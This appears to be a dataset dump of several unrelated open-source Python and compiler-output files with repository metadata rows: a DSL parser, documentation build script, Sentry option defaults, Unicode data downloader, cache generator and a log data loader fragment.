sys.path.insert(0, file_dir)
from main import app as application
from main import db
| 23.7 | 54 | 0.797468 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 21 | 0.088608 |
b9fa7c6bd7a253ee2a588381042c5dfd3d99cb96 | 2,560 | py | Python | yezdi/parser/parser.py | ragsagar/yezdi | 5b97bedc56d5af7f28b244a0d7c0c8259f643102 | [
"MIT"
] | 1 | 2021-04-27T20:07:42.000Z | 2021-04-27T20:07:42.000Z | yezdi/parser/parser.py | ragsagar/yezdi | 5b97bedc56d5af7f28b244a0d7c0c8259f643102 | [
"MIT"
] | null | null | null | yezdi/parser/parser.py | ragsagar/yezdi | 5b97bedc56d5af7f28b244a0d7c0c8259f643102 | [
"MIT"
] | null | null | null | from yezdi.lexer.token import TokenType
from yezdi.parser.ast import Program, Statement, Participant, Title, LineStatement
class Parser:
def __init__(self, lexer):
self.lexer = lexer
self.current_token = None
self.peek_token = None
self.next_token()
self.next_token()
self.participants = {}
def next_token(self):
self.current_token, self.peek_token = self.peek_token, self.lexer.next_token()
def parse_program(self):
program = Program()
while self.current_token.type != TokenType.EOF:
statement = self.parse_statement()
if statement:
program.statements.append(statement)
self.next_token()
return program
def parse_statement(self):
if self.current_token.type == TokenType.IDENTIFIER:
return self.parse_line_statement()
elif self.current_token.type == TokenType.TITLE:
return self.parse_title()
return None
def parse_line_statement(self):
participant_literal = self.current_token.literal
if not self.peek_token.type in [TokenType.SOLID_LINE, TokenType.DASHED_LINE]:
return None
self.next_token()
participant = Participant(participant_literal)
line = LineStatement(self.current_token.type)
line.set_source(participant)
if not self.expect_peek(TokenType.IDENTIFIER):
return None
target = Participant(self.current_token.literal)
line.set_target(target)
if not self.expect_peek(TokenType.COLON):
return None
if self.expect_peek(TokenType.IDENTIFIER):
line.set_info(self.current_token.literal)
if self.peek_token.type not in [TokenType.NEWLINE, TokenType.EOF]:
return None
statement = Statement(line)
return statement
def get_participant(self, value):
if value in self.participants:
return self.participants[value]
else:
participant = Participant(value)
self.participants[value] = participant
return participant
def expect_peek(self, token_type):
if self.peek_token.type == token_type:
self.next_token()
return True
else:
return False
def parse_title(self):
if not self.expect_peek(TokenType.IDENTIFIER):
return None
title = Title(self.current_token.literal)
return Statement(title)
class ParserError(Exception):
pass
| 32 | 86 | 0.640625 | 2,431 | 0.949609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
b9fae34b418d8854a4b364f1044c114896456110 | 1,050 | py | Python | scripts/check_categories.py | oberron/entolusis | 209e1e245d8e501e5e6ea2f52dd5b0da7d886f5c | [
"MIT"
] | null | null | null | scripts/check_categories.py | oberron/entolusis | 209e1e245d8e501e5e6ea2f52dd5b0da7d886f5c | [
"MIT"
] | null | null | null | scripts/check_categories.py | oberron/entolusis | 209e1e245d8e501e5e6ea2f52dd5b0da7d886f5c | [
"MIT"
] | null | null | null | # list categories in category folder
from os import walk
from os.path import abspath,join, pardir
categories_folder = abspath(join(__file__,pardir,pardir,"category"))
post_folder = abspath(join(__file__,pardir,pardir,"_posts"))
site_categories = []
for root,directories,files in walk(categories_folder):
for f in files:
site_categories.append(f.split(".md")[0])
site_categories = set(site_categories)
for root,directories,files in walk(post_folder):
for f in files:
with open(join(root,f),'r',encoding="utf-8") as fi:
lines = fi.readlines()
for l in lines:
if l.find("categories")==0:
categories = l.split(":")[1]
for c in [" ","[","]","\n"]:
categories = categories.replace(c,"")
categories=categories.split(",")
if len(set(categories)-site_categories)>0:
print(f,set(categories)-site_categories)
break
print("done") | 36.206897 | 68 | 0.578095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 108 | 0.102857 |
b9fb43e9d0e20574f25b444b461b284752a17b4c | 5,311 | py | Python | docsrc/makedoc.py | syoyo/soloud | cce88a2408a4b1e88ccbc75de9897b39bc3e7dda | [
"Libpng",
"Zlib"
] | 1 | 2019-11-25T11:32:09.000Z | 2019-11-25T11:32:09.000Z | docsrc/makedoc.py | syoyo/soloud | cce88a2408a4b1e88ccbc75de9897b39bc3e7dda | [
"Libpng",
"Zlib"
] | null | null | null | docsrc/makedoc.py | syoyo/soloud | cce88a2408a4b1e88ccbc75de9897b39bc3e7dda | [
"Libpng",
"Zlib"
] | null | null | null | #!/usr/bin/env python3
""" builds documentation files from multimarkdown (mmd) source
to various formats, including the web site and pdf.
"""
import subprocess
import glob
import os
import sys
import time
import shutil
src = [
"intro.mmd",
"downloads.mmd",
"quickstart.mmd",
"faq.mmd",
"dirstruct.mmd",
"premake.mmd",
"legal.mmd",
"concepts.mmd",
"concepts3d.mmd",
"voicemanagement.mmd",
"examples.mmd",
"foreign_interface.mmd",
"c_api.mmd",
"python_api.mmd",
"ruby_api.mmd",
"rpgmaker_api.mmd",
"bmx_api.mmd",
"gamemaker_api.mmd",
"cs_api.mmd",
"d_api.mmd",
"codegen.mmd",
"basics.mmd",
"attributes.mmd",
"faders.mmd",
"voicegroups.mmd",
"coremisc.mmd",
"core3d.mmd",
"audiosource.mmd",
"newsoundsources.mmd",
"wav.mmd",
"wavstream.mmd",
"speech.mmd",
"sfxr.mmd",
"modplug.mmd",
"monotone.mmd",
"tedsid.mmd",
"vizsn.mmd",
"vic.mmd",
"filters.mmd",
"biquadfilter.mmd",
"echofilter.mmd",
"lofifilter.mmd",
"flangerfilter.mmd",
"dcremovalfilter.mmd",
"fftfilter.mmd",
"bassboostfilter.mmd",
"waveshaperfilter.mmd",
"mixbus.mmd",
"queue.mmd",
"collider.mmd",
"attenuator.mmd",
"file.mmd",
"backends.mmd"
]
website_only = [
"downloads.mmd"
]
unknown = 0
for file in glob.glob("*.mmd"):
if file not in src:
unknown = 1
print(file + " not included in docs!")
if unknown:
print("Add the new files to makedoc.py, soloud.tex and htmlpre.txt.")
sys.exit()
datestring = time.strftime("%Y%m%d")
if not os.path.exists(datestring + "/web"):
os.makedirs(datestring + "/web")
if not os.path.exists("temp/"):
os.makedirs("temp/")
print("- -- --- -- - Generating single-file HTML docs")
callp = ["pandoc", "-s", "-t", "html5", "-f", "markdown-smart", "--metadata", 'title="SoLoud ' + datestring + '"', "-H", "singlehtml_head.txt", "-B", "singlehtml_body.txt", "--toc", "--self-contained", "--default-image-extension=png", "-o", datestring + "/soloud_" + datestring + ".html"]
for x in src:
if x not in website_only:
callp.append(x)
subprocess.call(callp)
print("- -- --- -- - Generating web site")
for x in src:
subprocess.call(["pandoc", "--template=html.pandoc", "-f", "markdown-smart", "--metadata", 'title="SoLoud ' + datestring + ' ' + x[:len(x)-4] + '"', "-B", "htmlpre.txt", "-A", "htmlpost.txt", "--default-image-extension=png", x, "-o", datestring + "/web/" + x[:len(x)-3]+"html.bak"])
with open(datestring + "/web/" + x[:len(x)-3]+"html", "w") as file_out:
with open(datestring + "/web/" + x[:len(x)-3]+"html.bak", "r") as file_in:
for line in file_in:
file_out.write(line.replace('code>', 'code>\n').replace('::','::<wbr>').replace('\xc2','').replace('\xa0',''))
if x == "intro.mmd":
if os.path.isfile(datestring + "/web/index.html"):
os.remove(datestring + "/web/index.html")
os.rename(datestring + "/web/intro.html", datestring + "/web/index.html")
print("- -- --- -- - Generating epub")
callp = ["pandoc", "-N", "--toc", "--epub-cover-image=images/cover.png", "-t", "epub3", "--default-image-extension=png", "-f", "markdown-smart", "--css=epub.css", "--epub-metadata=metadata.xml", "-o", datestring + "/soloud_" + datestring + ".epub", "title.txt"]
for x in src:
if x not in website_only:
callp.append(x)
subprocess.call(callp)
print("- -- --- -- - Converting epub -> mobi (kindlegen_output.txt)")
with open('kindlegen_output.txt', 'w') as outfile:
subprocess.call(["kindlegen", datestring + "/soloud_" + datestring + ".epub", "-c2"], stdout=outfile)
print("- -- --- -- - Generating LaTex")
for x in src:
if x not in website_only:
subprocess.call(["pandoc", "-t", "latex", "--listings", "--default-image-extension=pdf", "--top-level-division=chapter", x, "-o", "temp/" + x[:len(x)-3]+"tex.orig"])
with open("temp/" + x[:len(x)-3]+"tex", "w") as file_out:
with open("temp/" + x[:len(x)-3]+"tex.orig", "r") as file_in:
for line in file_in:
file_out.write(line.replace('\\begin{longtable}[]{@{}ll@{}}', '\\begin{tabulary}{\\textwidth}{lJ}').replace('\\begin{longtable}[]{@{}lll@{}}', '\\begin{tabulary}{\\textwidth}{lJJ}').replace('\\begin{longtable}[]{@{}llll@{}}', '\\begin{tabulary}{\\textwidth}{lJJJ}').replace('\\endhead','').replace('\\end{longtable}','\\end{tabulary}'))
print("- -- --- -- - Generating pdf (xelatex_output.txt)")
with open('xelatex_output.txt', 'w') as outfile:
subprocess.call(["xelatex", "SoLoud.tex"], stdout=outfile)
print("- -- --- -- - Generating pdf pass 2..")
subprocess.call(["xelatex", "SoLoud.tex"], stdout=outfile)
shutil.move("SoLoud.pdf", datestring + "/soloud_" + datestring + ".pdf")
print("- -- --- -- - Cleanup..")
tempsuffix = ["aux", "toc", "out", "log", "lg", "4ct", "4tc", "idv", "tmp", "xdv", "xref", "bak"]
for suffix in tempsuffix:
for file in glob.glob("*."+suffix):
os.remove(file)
for file in glob.glob(datestring + "/web/*."+suffix):
os.remove(file)
for file in glob.glob("temp/*"):
os.remove(file)
os.rmdir("temp")
print("- -- --- -- - Done - " + datestring)
| 34.940789 | 356 | 0.583129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,775 | 0.5225 |
b9fc3dd10a80beed547f86b535cfadc6f817e0e2 | 4,872 | tac | Python | 6 复试/2 笔试/4 编译原理/hw/2016_黄家晖_PA/550405220_4_decaf_PA3/TestCases/S3/output/t9.tac | ladike/912_project | 5178c1c93ac6ca30ffc72dd689f5c6932704b4ab | [
"MIT"
] | 1 | 2022-03-02T16:05:49.000Z | 2022-03-02T16:05:49.000Z | 6 复试/2 笔试/4 编译原理/hw/2016_黄家晖_PA/550405220_4_decaf_PA3/TestCases/S3/output/t9.tac | ladike/912_project | 5178c1c93ac6ca30ffc72dd689f5c6932704b4ab | [
"MIT"
] | null | null | null | 6 复试/2 笔试/4 编译原理/hw/2016_黄家晖_PA/550405220_4_decaf_PA3/TestCases/S3/output/t9.tac | ladike/912_project | 5178c1c93ac6ca30ffc72dd689f5c6932704b4ab | [
"MIT"
] | null | null | null | VTABLE(_Main) {
<empty>
Main
_Main.COPY;
}
VTABLE(_Base) {
<empty>
Base
_Base.COPY;
}
VTABLE(_Sub1) {
_Base
Sub1
_Sub1.COPY;
}
VTABLE(_Sub2) {
_Base
Sub2
_Sub2.COPY;
}
VTABLE(_Sub3) {
_Sub1
Sub3
_Sub3.COPY;
}
VTABLE(_Sub4) {
_Sub3
Sub4
_Sub4.COPY;
}
FUNCTION(_Main_New) {
memo ''
_Main_New:
_T1 = 4
parm _T1
_T2 = call _Alloc
_T3 = VTBL <_Main>
*(_T2 + 0) = _T3
return _T2
}
FUNCTION(_Main.COPY) {
memo '_T4:4'
_Main.COPY:
_T5 = 4
parm _T5
_T6 = call _Alloc
_T7 = VTBL <_Main>
*(_T6 + 0) = _T7
return _T6
}
FUNCTION(_Base_New) {
memo ''
_Base_New:
_T8 = 4
parm _T8
_T9 = call _Alloc
_T10 = VTBL <_Base>
*(_T9 + 0) = _T10
return _T9
}
FUNCTION(_Base.COPY) {
memo '_T11:4'
_Base.COPY:
_T12 = 4
parm _T12
_T13 = call _Alloc
_T14 = VTBL <_Base>
*(_T13 + 0) = _T14
return _T13
}
FUNCTION(_Sub1_New) {
memo ''
_Sub1_New:
_T15 = 4
parm _T15
_T16 = call _Alloc
_T17 = VTBL <_Sub1>
*(_T16 + 0) = _T17
return _T16
}
FUNCTION(_Sub1.COPY) {
memo '_T18:4'
_Sub1.COPY:
_T19 = 4
parm _T19
_T20 = call _Alloc
_T21 = VTBL <_Sub1>
*(_T20 + 0) = _T21
return _T20
}
FUNCTION(_Sub2_New) {
memo ''
_Sub2_New:
_T22 = 4
parm _T22
_T23 = call _Alloc
_T24 = VTBL <_Sub2>
*(_T23 + 0) = _T24
return _T23
}
FUNCTION(_Sub2.COPY) {
memo '_T25:4'
_Sub2.COPY:
_T26 = 4
parm _T26
_T27 = call _Alloc
_T28 = VTBL <_Sub2>
*(_T27 + 0) = _T28
return _T27
}
FUNCTION(_Sub3_New) {
memo ''
_Sub3_New:
_T29 = 4
parm _T29
_T30 = call _Alloc
_T31 = VTBL <_Sub3>
*(_T30 + 0) = _T31
return _T30
}
FUNCTION(_Sub3.COPY) {
memo '_T32:4'
_Sub3.COPY:
_T33 = 4
parm _T33
_T34 = call _Alloc
_T35 = VTBL <_Sub3>
*(_T34 + 0) = _T35
return _T34
}
FUNCTION(_Sub4_New) {
memo ''
_Sub4_New:
_T36 = 4
parm _T36
_T37 = call _Alloc
_T38 = VTBL <_Sub4>
*(_T37 + 0) = _T38
return _T37
}
FUNCTION(_Sub4.COPY) {
memo '_T39:4'
_Sub4.COPY:
_T40 = 4
parm _T40
_T41 = call _Alloc
_T42 = VTBL <_Sub4>
*(_T41 + 0) = _T42
return _T41
}
FUNCTION(main) {
memo ''
main:
_T48 = call _Base_New
_T43 = _T48
_T49 = call _Sub1_New
_T44 = _T49
_T50 = call _Sub2_New
_T45 = _T50
_T51 = call _Sub3_New
_T46 = _T51
_T52 = call _Sub4_New
_T47 = _T52
parm _T43
call _Main.printType
parm _T44
call _Main.printType
parm _T45
call _Main.printType
parm _T46
call _Main.printType
parm _T47
call _Main.printType
_T43 = _T47
parm _T43
call _Main.printType
_T54 = VTBL <_Sub1>
_T55 = *(_T43 + 0)
_L22:
_T53 = (_T54 == _T55)
if (_T53 != 0) branch _L23
_T55 = *(_T55 + 0)
if (_T55 != 0) branch _L22
_T56 = "Decaf runtime error: "
parm _T56
call _PrintString
_T57 = *(_T43 + 0)
_T58 = *(_T57 + 4)
parm _T58
call _PrintString
_T59 = " cannot be cast to "
parm _T59
call _PrintString
_T60 = VTBL <_Sub1>
_T61 = *(_T60 + 4)
parm _T61
call _PrintString
_T62 = "\n"
parm _T62
call _PrintString
call _Halt
_L23:
_T44 = _T43
parm _T44
call _Main.printType
}
FUNCTION(_Main.printType) {
memo '_T0:4'
_Main.printType:
_T64 = VTBL <_Sub4>
_T65 = *(_T0 + 0)
_L24:
_T63 = (_T64 == _T65)
if (_T63 != 0) branch _L25
_T65 = *(_T65 + 0)
if (_T65 != 0) branch _L24
_T63 = 0
_L25:
if (_T63 == 0) branch _L26
_T66 = "Sub4\n"
parm _T66
call _PrintString
branch _L27
_L26:
_T68 = VTBL <_Sub3>
_T69 = *(_T0 + 0)
_L28:
_T67 = (_T68 == _T69)
if (_T67 != 0) branch _L29
_T69 = *(_T69 + 0)
if (_T69 != 0) branch _L28
_T67 = 0
_L29:
if (_T67 == 0) branch _L30
_T70 = "Sub3\n"
parm _T70
call _PrintString
branch _L31
_L30:
_T72 = VTBL <_Sub2>
_T73 = *(_T0 + 0)
_L32:
_T71 = (_T72 == _T73)
if (_T71 != 0) branch _L33
_T73 = *(_T73 + 0)
if (_T73 != 0) branch _L32
_T71 = 0
_L33:
if (_T71 == 0) branch _L34
_T74 = "Sub2\n"
parm _T74
call _PrintString
branch _L35
_L34:
_T76 = VTBL <_Sub1>
_T77 = *(_T0 + 0)
_L36:
_T75 = (_T76 == _T77)
if (_T75 != 0) branch _L37
_T77 = *(_T77 + 0)
if (_T77 != 0) branch _L36
_T75 = 0
_L37:
if (_T75 == 0) branch _L38
_T78 = "Sub1\n"
parm _T78
call _PrintString
branch _L39
_L38:
_T80 = VTBL <_Base>
_T81 = *(_T0 + 0)
_L40:
_T79 = (_T80 == _T81)
if (_T79 != 0) branch _L41
_T81 = *(_T81 + 0)
if (_T81 != 0) branch _L40
_T79 = 0
_L41:
if (_T79 == 0) branch _L42
_T82 = "Base\n"
parm _T82
call _PrintString
_L42:
_L39:
_L35:
_L31:
_L27:
}
| 15.76699 | 34 | 0.555829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 156 | 0.03202 |
b9fc6312cdae3331d02a69bbbf58d767d486a41b | 1,361 | py | Python | arch/api/base/utils/party.py | yzjba/FATE | 9a6d252da637b2583a0f8a51f6cb4c615850bab9 | [
"Apache-2.0"
] | 32 | 2020-06-12T08:39:58.000Z | 2022-03-20T06:57:08.000Z | arch/api/base/utils/party.py | ErikSun2020/FATE | bdda535c7d8a974fc2c43102837964b7da199730 | [
"Apache-2.0"
] | 10 | 2020-11-13T18:55:48.000Z | 2022-02-10T02:00:12.000Z | arch/api/base/utils/party.py | ErikSun2020/FATE | bdda535c7d8a974fc2c43102837964b7da199730 | [
"Apache-2.0"
] | 16 | 2020-06-12T06:51:46.000Z | 2022-03-29T10:23:42.000Z | #
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Party(object):
"""
Uniquely identify
"""
def __init__(self, role, party_id):
self.role = role
self.party_id = party_id
def __hash__(self):
return (self.role, self.party_id).__hash__()
def __str__(self):
return f"Party(role={self.role}, party_id={self.party_id})"
def __repr__(self):
return self.__str__()
def __lt__(self, other):
return (self.role, self.party_id) < (other.role, other.party_id)
def __eq__(self, other):
return self.party_id == other.party_id and self.role == other.role
def to_pb(self):
from arch.api.proto import federation_pb2
return federation_pb2.Party(partyId=f"{self.party_id}", name=self.role)
| 30.244444 | 79 | 0.683321 | 742 | 0.545187 | 0 | 0 | 0 | 0 | 0 | 0 | 704 | 0.517267 |
b9fd9ad743eac1d46c7b5d951facfcfa09dbb1bf | 3,778 | py | Python | src/sentry/options/defaults.py | faulkner/sentry | f9dd4d0d7c683632cf02810c03bd42d7051ad010 | [
"BSD-3-Clause"
] | null | null | null | src/sentry/options/defaults.py | faulkner/sentry | f9dd4d0d7c683632cf02810c03bd42d7051ad010 | [
"BSD-3-Clause"
] | null | null | null | src/sentry/options/defaults.py | faulkner/sentry | f9dd4d0d7c683632cf02810c03bd42d7051ad010 | [
"BSD-3-Clause"
] | null | null | null | """
sentry.options.defaults
~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
from sentry.logging import LoggingFormat
from sentry.options import (
FLAG_IMMUTABLE, FLAG_NOSTORE, FLAG_PRIORITIZE_DISK, FLAG_REQUIRED, FLAG_ALLOW_EMPTY,
register,
)
from sentry.utils.types import Dict, String, Sequence
# Cache
# register('cache.backend', flags=FLAG_NOSTORE)
# register('cache.options', type=Dict, flags=FLAG_NOSTORE)
# System
register('system.admin-email', flags=FLAG_REQUIRED)
register('system.support-email', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('system.security-email', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('system.databases', type=Dict, flags=FLAG_NOSTORE)
# register('system.debug', default=False, flags=FLAG_NOSTORE)
register('system.rate-limit', default=0, flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('system.secret-key', flags=FLAG_NOSTORE)
# Absolute URL to the sentry root directory. Should not include a trailing slash.
register('system.url-prefix', ttl=60, grace=3600, flags=FLAG_REQUIRED | FLAG_PRIORITIZE_DISK)
register('system.root-api-key', flags=FLAG_PRIORITIZE_DISK)
register('system.logging-format', default=LoggingFormat.HUMAN, flags=FLAG_NOSTORE)
# Redis
register(
'redis.clusters',
type=Dict,
default={
'default': {
'hosts': {
0: {
'host': '127.0.0.1',
'port': 6379,
}
},
},
},
flags=FLAG_NOSTORE | FLAG_IMMUTABLE
)
register('redis.options', type=Dict, flags=FLAG_NOSTORE)
# symbolizer specifics
register('dsym.cache-path', type=String, default='/tmp/sentry-dsym-cache')
# Mail
register('mail.backend', default='smtp', flags=FLAG_NOSTORE)
register('mail.host', default='localhost', flags=FLAG_REQUIRED | FLAG_PRIORITIZE_DISK)
register('mail.port', default=25, flags=FLAG_REQUIRED | FLAG_PRIORITIZE_DISK)
register('mail.username', flags=FLAG_REQUIRED | FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('mail.password', flags=FLAG_REQUIRED | FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('mail.use-tls', default=False, flags=FLAG_REQUIRED | FLAG_PRIORITIZE_DISK)
register('mail.subject-prefix', default='[Sentry] ', flags=FLAG_PRIORITIZE_DISK)
register('mail.from', default='root@localhost', flags=FLAG_REQUIRED | FLAG_PRIORITIZE_DISK)
register('mail.list-namespace', type=String, default='localhost', flags=FLAG_NOSTORE)
register('mail.enable-replies', default=False, flags=FLAG_PRIORITIZE_DISK)
register('mail.reply-hostname', default='', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('mail.mailgun-api-key', default='', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
# SMS
register('sms.twilio-account', default='', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('sms.twilio-token', default='', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('sms.twilio-number', default='', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
# U2F
register('u2f.app-id', default='', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('u2f.facets', default=(), type=Sequence,
flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('auth.ip-rate-limit', default=0, flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('auth.user-rate-limit', default=0, flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('api.rate-limit.org-create', default=5, flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
# Filestore
register('filestore.backend', default='filesystem', flags=FLAG_NOSTORE)
register('filestore.options', default={'location': '/tmp/sentry-files'}, flags=FLAG_NOSTORE)
| 43.425287 | 95 | 0.75172 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,283 | 0.339598 |
b9ff46cab163507c14f9b26bf086ce4979f54a2c | 4,972 | py | Python | tools/unidatadownload.py | henryiii/backrefs | ec82844098bc3bdc7bcaa61b32f80271e6a73da6 | [
"MIT"
] | null | null | null | tools/unidatadownload.py | henryiii/backrefs | ec82844098bc3bdc7bcaa61b32f80271e6a73da6 | [
"MIT"
] | null | null | null | tools/unidatadownload.py | henryiii/backrefs | ec82844098bc3bdc7bcaa61b32f80271e6a73da6 | [
"MIT"
] | null | null | null | """Download `Unicodedata` files."""
from __future__ import unicode_literals
import os
import zipfile
import codecs
from urllib.request import urlopen
__version__ = '2.2.0'
HOME = os.path.dirname(os.path.abspath(__file__))
def zip_unicode(output, version):
"""Zip the Unicode files."""
zipper = zipfile.ZipFile(os.path.join(output, 'unicodedata', '%s.zip' % version), 'w', zipfile.ZIP_DEFLATED)
target = os.path.join(output, 'unicodedata', version)
print('Zipping %s.zip...' % version)
for root, dirs, files in os.walk(target):
for file in files:
if file.endswith('.txt'):
zipper.write(os.path.join(root, file), arcname=file)
def unzip_unicode(output, version):
"""Unzip the Unicode files."""
unzipper = zipfile.ZipFile(os.path.join(output, 'unicodedata', '%s.zip' % version))
target = os.path.join(output, 'unicodedata', version)
print('Unzipping %s.zip...' % version)
os.makedirs(target)
for f in unzipper.namelist():
# Do I need backslash on windows? Or is it forward as well?
unzipper.extract(f, target)
def download_unicodedata(version, output=HOME, no_zip=False):
"""Download Unicode data scripts and blocks."""
ver = tuple([int(x) for x in version.split('.')])
files = [
'UnicodeData.txt',
'Scripts.txt',
'Blocks.txt',
'PropList.txt',
'DerivedCoreProperties.txt',
'DerivedNormalizationProps.txt',
'CompositionExclusions.txt',
'PropertyValueAliases.txt',
'PropertyAliases.txt',
'EastAsianWidth.txt',
'LineBreak.txt',
'HangulSyllableType.txt',
'DerivedAge.txt',
'auxiliary/WordBreakProperty.txt',
'auxiliary/SentenceBreakProperty.txt',
'auxiliary/GraphemeBreakProperty.txt',
'extracted/DerivedDecompositionType.txt',
'extracted/DerivedNumericType.txt',
'extracted/DerivedNumericValues.txt',
'extracted/DerivedJoiningType.txt',
'extracted/DerivedJoiningGroup.txt',
'extracted/DerivedCombiningClass.txt',
'emoji/emoji-data.txt'
]
files.append('ScriptExtensions.txt')
files.append('IndicPositionalCategory.txt')
files.append('IndicSyllabicCategory.txt')
files.append('BidiBrackets.txt')
if ver >= (11, 0, 0):
files.append('VerticalOrientation.txt')
http_url = 'http://www.unicode.org/Public/%s/ucd/' % version
ftp_url = 'ftp://ftp.unicode.org/Public/%s/ucd/' % version
destination = os.path.join(output, 'unicodedata', version)
if not os.path.exists(destination):
os.makedirs(destination)
zip_data = not no_zip
for f in files:
file_location = os.path.join(destination, os.path.basename(f))
retrieved = False
if not os.path.exists(file_location):
for url in (ftp_url, http_url):
furl = url + f
try:
print('Downloading: %s --> %s' % (furl, file_location))
response = urlopen(furl, timeout=30)
data = response.read()
except Exception:
print('Failed: %s' % url)
continue
with codecs.open(file_location, 'w', encoding='utf-8') as uf:
uf.write(data.decode('utf-8'))
retrieved = True
break
if not retrieved:
print('Failed to acquire all needed Unicode files!')
break
else:
retrieved = True
print('Skipping: found %s' % file_location)
if not retrieved:
zip_data = False
break
if zip_data and not os.path.exists(os.path.join(output, 'unicodedata', '%s.zip' % version)):
zip_unicode(output, version)
def get_unicodedata(version, output=HOME, no_zip=False):
"""Ensure we have Unicode data to generate Unicode tables."""
target = os.path.join(output, 'unicodedata', version)
zip_target = os.path.join(output, 'unicodedata', '%s.zip' % version)
if not os.path.exists(target) and os.path.exists(zip_target):
unzip_unicode(output, version)
# Download missing files if any. Zip if required.
download_unicodedata(version, output, no_zip)
if __name__ == '__main__':
import argparse
import unicodedata
parser = argparse.ArgumentParser(prog='unidatadownload', description='Generate a unicode property table.')
parser.add_argument('--version', action='version', version="%(prog)s " + __version__)
parser.add_argument('--output', default=HOME, help='Output file.')
parser.add_argument('--unicode-version', default=None, help='Force a specific Unicode version.')
args = parser.parse_args()
if args.unicode_version is None:
version = unicodedata.unidata_version
else:
version = args.unicode_version
get_unicodedata(version, output=args.output)
| 32.927152 | 112 | 0.627715 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,600 | 0.321802 |
b9ffb7c6fff3e245dc8ea1ea786cc6f60c2d4cde | 2,427 | py | Python | generator/cache/cache.py | biarmic/OpenCache | bb9e110e434deb83900de328cc76b63901ba582f | [
"BSD-3-Clause"
] | 5 | 2021-09-15T18:29:49.000Z | 2022-03-26T04:41:01.000Z | generator/cache/cache.py | VLSIDA/OpenCache | 0e79bf353c68d57dcc49d78178b12fd0b468f19a | [
"BSD-3-Clause"
] | null | null | null | generator/cache/cache.py | VLSIDA/OpenCache | 0e79bf353c68d57dcc49d78178b12fd0b468f19a | [
"BSD-3-Clause"
] | null | null | null | # See LICENSE for licensing information.
#
# Copyright (c) 2021 Regents of the University of California and The Board
# of Regents for the Oklahoma Agricultural and Mechanical College
# (acting for and on behalf of Oklahoma State University)
# All rights reserved.
#
import debug
import datetime
from policy import associativity
from globals import OPTS, print_time
class cache:
"""
This is not a design module, but contains a cache design instance.
"""
def __init__(self, cache_config, name):
cache_config.set_local_config(self)
self.name = name
# Import the design module of the cache
if OPTS.associativity == associativity.DIRECT:
from direct_cache import direct_cache as cache
elif OPTS.associativity == associativity.N_WAY:
from n_way_cache import n_way_cache as cache
elif OPTS.associativity == associativity.FULLY:
# TODO: from full_cache import full_cache as cache
debug.error("Fully associative cache is not supported at the moment.", -1)
else:
debug.error("Invalid associativity.", -1)
self.c = cache(cache_config, name)
def config_write(self, paths):
""" Save the config files. """
self.c.config_write(paths)
def verilog_write(self, path):
""" Save the Verilog file. """
self.c.verilog_write(path)
def save(self):
""" Save all the output files. """
debug.print_raw("Saving output files...")
# Write the config files
start_time = datetime.datetime.now()
cpaths = {
"data": OPTS.output_path + OPTS.data_array_name + "_config.py",
"tag": OPTS.output_path + OPTS.tag_array_name + "_config.py",
"use": OPTS.output_path + OPTS.use_array_name + "_config.py"
}
if not OPTS.replacement_policy.has_sram_array(): del cpaths["use"]
for k, cpath in cpaths.items():
debug.print_raw("Config: Writing to {}".format(cpath))
self.config_write(cpaths)
print_time("Config", datetime.datetime.now(), start_time)
# Write the Verilog file
start_time = datetime.datetime.now()
vpath = OPTS.output_path + self.c.name + ".v"
debug.print_raw("Verilog: Writing to {}".format(vpath))
self.verilog_write(vpath)
print_time("Verilog", datetime.datetime.now(), start_time) | 33.246575 | 86 | 0.646477 | 2,059 | 0.848372 | 0 | 0 | 0 | 0 | 0 | 0 | 803 | 0.330861 |
b9ffed8a41299969ab07da01999635758df5ba4f | 11,469 | py | Python | utils/data_loader.py | elieser1101/loglizer | 985c5f582fbbe4d6365184086ac091134a5b5d07 | [
"MIT"
] | null | null | null | utils/data_loader.py | elieser1101/loglizer | 985c5f582fbbe4d6365184086ac091134a5b5d07 | [
"MIT"
] | null | null | null | utils/data_loader.py | elieser1101/loglizer | 985c5f582fbbe4d6365184086ac091134a5b5d07 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Shilin He'
import pandas as pd
import os
import numpy as np
def hdfs_data_loader(para):
""" load the log sequence matrix and labels from the file path.
Args:
--------
para: the parameters dictionary
Returns:
--------
raw_data: log sequences matrix
label_data: labels matrix
"""
file_path = para['path'] + para['log_seq_file_name']
label_path = para['path'] + para['label_file_name']
# load log sequence matrix
